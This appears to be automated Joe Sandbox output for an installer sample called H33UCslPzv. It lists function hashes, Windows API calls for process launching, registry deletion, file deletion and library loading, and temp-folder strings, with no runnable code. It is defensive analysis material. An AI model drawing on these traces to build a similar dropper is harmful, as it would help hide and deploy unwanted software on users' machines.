                                                                  • Instruction ID: 2e4321f520f0c42760b8dd6c663e9e781067c597ec393d4c632fa8beed11a635
                                                                  • Opcode Fuzzy Hash: 1030a17f86b53444e8a5a3b6bccfdd0324da9206876f6c82357e637410bb066d
                                                                  • Instruction Fuzzy Hash: 3B019A7250020AAADF22CF20CC09FDB3BA8EF55360F00442AF904A2190D278CA54CFA8
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D50,Error launching installer), ref: 004056B5
                                                                  • CloseHandle.KERNEL32(?), ref: 004056C2
                                                                  Strings
                                                                  • Error launching installer, xrefs: 0040569F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: f0a19a88b4191ad482a62bb3ee09ede63fcf5498891b486954be21cba29d19c8
                                                                  • Instruction ID: 2140ebbf1eee4cb4891f52a8ff1fd75339fa61df53f1a1a9c1e04f6e33d43294
                                                                  • Opcode Fuzzy Hash: f0a19a88b4191ad482a62bb3ee09ede63fcf5498891b486954be21cba29d19c8
                                                                  • Instruction Fuzzy Hash: 40E0BFF5610209BFEB009FA4DE05F7B7BBDEB40704F404925BD10F2160D774A8148A78
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401BD2
                                                                  • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BE4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree
                                                                  • String ID: Call
                                                                  • API String ID: 3394109436-1824292864
                                                                  • Opcode ID: 0c7e03365e78e5f53160c38106d7799ec7c3d82922276c3652d28a6b45986a8d
                                                                  • Instruction ID: d2abead86699fb04bb4c65c6c7568298ee189deef15247f37ebdc11345ca5c8d
                                                                  • Opcode Fuzzy Hash: 0c7e03365e78e5f53160c38106d7799ec7c3d82922276c3652d28a6b45986a8d
                                                                  • Instruction Fuzzy Hash: 902163B36001019BDB10EBA4DE85D6E73E9EB49328B20443BF501F32D1E77D98419B9D
                                                                  APIs
                                                                    • Part of subcall function 004056CF: ShellExecuteExA.SHELL32(?,00401F29,?), ref: 004056DE
                                                                    • Part of subcall function 004063FA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F43,?,?,?,?,?,?), ref: 0040640B
                                                                    • Part of subcall function 004063FA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040642D
                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00401F8D
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\unscorified\Pacinian, xrefs: 00401F11
                                                                  • @, xrefs: 00401F31
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                                  • String ID: @$C:\Users\user\AppData\Local\Temp\unscorified\Pacinian
                                                                  • API String ID: 165873841-2405383263
                                                                  • Opcode ID: 8519022bf249ecbbc196bf988a98103f7eb23198aad2c35d86c9091ea44dd8f3
                                                                  • Instruction ID: 6fb4e818f2c942e9b4bba88a026eebdec746967c1f1042f55a0f18c21242a27d
                                                                  • Opcode Fuzzy Hash: 8519022bf249ecbbc196bf988a98103f7eb23198aad2c35d86c9091ea44dd8f3
                                                                  • Instruction Fuzzy Hash: DA113D71E042049ACB12EFB98A45A8DBFF4AF09318F24057BE555F72D2DBB88801DB18
                                                                  APIs
                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402591
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx6761.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseValue
                                                                  • String ID:
                                                                  • API String ID: 397863658-0
                                                                  • Opcode ID: 5fdd96a4c8267d24c04b63ca7e37b561cfa3a4140926a300f230920ceefefb6b
                                                                  • Instruction ID: dbd097197b1ddcdec4c3bfd44c4d49ca57d6fe8d8a156bba66eafe5791494d89
                                                                  • Opcode Fuzzy Hash: 5fdd96a4c8267d24c04b63ca7e37b561cfa3a4140926a300f230920ceefefb6b
                                                                  • Instruction Fuzzy Hash: D801BCB1901204FFE711DF699E89ABF7ABCEB81344F10403EF442B62C0D6B84E009629
                                                                  APIs
                                                                    • Part of subcall function 00405B61: GetFileAttributesA.KERNELBASE(?,?,00405779,?,?,00000000,0040595C,?,?,?,?), ref: 00405B66
                                                                    • Part of subcall function 00405B61: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B7A
                                                                  • RemoveDirectoryA.KERNEL32(?,?,?,00000000,0040595C), ref: 00405788
                                                                  • DeleteFileA.KERNELBASE(?,?,?,00000000,0040595C), ref: 00405790
                                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 004057A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                                                  • String ID:
                                                                  • API String ID: 1655745494-0
                                                                  • Opcode ID: 1b58439dbc4d5c75e8d4a1b60800a1a05f091bf10d9841f58e7402e1275724a5
                                                                  • Instruction ID: 89e2ffb4eeb90fd48554f64b8be6f4befc75c99c48748cc7a9a51ea4a82828fd
                                                                  • Opcode Fuzzy Hash: 1b58439dbc4d5c75e8d4a1b60800a1a05f091bf10d9841f58e7402e1275724a5
                                                                  • Instruction Fuzzy Hash: 79E0E531115A5096C21057348E0CB5F2A98DFC6724F05093AF992F30C0D77C49469A7E
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 0040250A
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx6761.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3356406503-0
                                                                  • Opcode ID: 06f9a05988a77b4bdcc6cb49dfa9bbed22794e88a516823340940e2e8d0fbd08
                                                                  • Instruction ID: e432cc5542b3a476208e1b79bea1c70747d30db9775ab40f8372a11ce444457e
                                                                  • Opcode Fuzzy Hash: 06f9a05988a77b4bdcc6cb49dfa9bbed22794e88a516823340940e2e8d0fbd08
                                                                  • Instruction Fuzzy Hash: 5E118C71901205FEDB11CF64CA5D9AEBAB4AF19348F60447FE442B62C0D6B88A45DB2D
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 7c42d570b17a0fed6318748d5d62b609da708fc0185faa880c17ecc6591740a1
                                                                  • Instruction ID: e022dd21a705f7d2fe13c48a1103892d377d282aa69ae92f3ff2ae7c0e9cbe23
                                                                  • Opcode Fuzzy Hash: 7c42d570b17a0fed6318748d5d62b609da708fc0185faa880c17ecc6591740a1
                                                                  • Instruction Fuzzy Hash: C601F4316202209FE7094B389D04B2A36A8E751354F10813FF955F65F2D678CC028B4C
                                                                  APIs
                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402409
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402412
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteValue
                                                                  • String ID:
                                                                  • API String ID: 2831762973-0
                                                                  • Opcode ID: 405a4329a5c828b21355242cc628517a7d900edba7cc5ebd2e5852863e1045d2
                                                                  • Instruction ID: 49501c94728b366df12ca2e4d909b612e79837c42632e001697d6088b151e408
                                                                  • Opcode Fuzzy Hash: 405a4329a5c828b21355242cc628517a7d900edba7cc5ebd2e5852863e1045d2
                                                                  • Instruction Fuzzy Hash: 5BF0BB32A00120ABD701AFB89B4DBAE72B99B54314F15417FF502B72C1D5FC5E01876D
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 0040260B
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll, xrefs: 004025FC, 00402621
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll
                                                                  • API String ID: 1659193697-604763050
                                                                  • Opcode ID: 98744e92278e77381a877ce22c2859315e27ca794b81704b9867eff1eeef6133
                                                                  • Instruction ID: 6bdf981ca1be840b674a071183a736e23abd1ab340c7258522d34cd24c38b4c9
                                                                  • Opcode Fuzzy Hash: 98744e92278e77381a877ce22c2859315e27ca794b81704b9867eff1eeef6133
                                                                  • Instruction Fuzzy Hash: 67F0E971948340ABC701EBB55A8999F66B4DBC5304B20483FE001B71C2C5BC4441961E
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EAD
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401EB8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnableShow
                                                                  • String ID:
                                                                  • API String ID: 1136574915-0
                                                                  • Opcode ID: 30a7aefe36c03ed8ebba05a6927d3a517de9a20db24bb2af88aa016f02d7e68a
                                                                  • Instruction ID: 33cda2ed04c3da629839a1ed70eaf652a1c817d3d699623c6adcec252e127601
                                                                  • Opcode Fuzzy Hash: 30a7aefe36c03ed8ebba05a6927d3a517de9a20db24bb2af88aa016f02d7e68a
                                                                  • Instruction Fuzzy Hash: 4FE01272A04210DFD705DFA8AE859AE77B4FB84325F10493BE102F11D1D7B85841966D
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000), ref: 00401581
                                                                  • ShowWindow.USER32(0001040A), ref: 00401596
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: e076315d432f252b18020cd23f11f5fa0b9b95d4c85057e9c40fbf447670c9d3
                                                                  • Instruction ID: 9939d567be1ae21951fa300f882ca9363235c0aad14cd7a96026ed132ac70b09
                                                                  • Opcode Fuzzy Hash: e076315d432f252b18020cd23f11f5fa0b9b95d4c85057e9c40fbf447670c9d3
                                                                  • Instruction Fuzzy Hash: 50E0E6B6710114ABCB15DB58EED087E73B9EBC5350750453FD902F36A1C6789D418B68
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                    • Part of subcall function 00406317: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
                                                                    • Part of subcall function 00406317: wsprintfA.USER32 ref: 00406367
                                                                    • Part of subcall function 00406317: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040637B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
